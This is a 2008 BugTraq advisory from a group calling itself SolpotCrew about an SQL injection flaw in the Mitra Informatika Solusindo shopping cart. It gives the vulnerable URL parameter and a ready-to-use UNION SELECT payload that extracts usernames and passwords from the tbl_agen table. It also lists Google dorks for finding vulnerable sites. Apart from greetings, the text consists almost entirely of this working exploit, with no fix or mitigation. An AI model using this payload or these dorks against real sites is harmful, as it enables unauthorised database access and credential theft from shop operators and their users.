BugTraq
SolpotCrew Advisory #16 - Mitra Informatika Solusindo cart Remote Sql Injection Exploit Mar 04 2008 08:08PM
nyubicrew irc mildnet cn
#############################SolpotCrew Community################################

#

# Mitra Informatika Solusindo cart Remote Sql Injection Exploit

#

# vendor : http://www.mitrainformatika.com/

#

########################################################################
#########

#

#

# Bug Found By : home_edition2001 a.k.a (bius) (4-03-2008)

#

# contact: bius-was-here (at) dinastore (dot) com [email concealed]

#

# Website : www.solpotcrew.org/adv/home_edition2001-adv-03.txt

#

########################################################################
########

#

#

# Greetz: NYUBI,h4ntu,Ibnusina , Sikodoq , ghareng , Saritem ,Ingin_belajar

# pannel , Matdhule , Naruto , d\i\c\k\y , ASP , Roney , live

# kabut , Portrait , huhuhu , geronimo , Bolis ,HearTBreaK

# Blue|spy , X8 , dead , ZDe , K1tk4t , webmaster

# x-ace , ardan , th3sn0wbr4in , BrainDrain

# and all member solpotcrew community

# http://www.solpotcrew.org/forum/

# #nyubicrew @ irc.mildnet.cn

# especially thx to str0ke @ milw0rm.com

#

########################################################################
#######

# Exploit in: #

# /index.php?c=10&p=-7(SQL) #

# #

# Example: #

# #

# (SQL)%20union%20select%200,concat(user_name,user_password),null,null,nul
l,null,null,null%20from%20tbl_agen--

########################################################################
####

google dork : Powered by Mitra Informatika Solusindo

Mitra Informatika Solusindo cart

intitle:'Mitra Informatika Solusindo' Shopingcart System

##############################MY LOVE JUST FOR U Dina Mariance#########################

######################################E.O.F#############################
#####

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus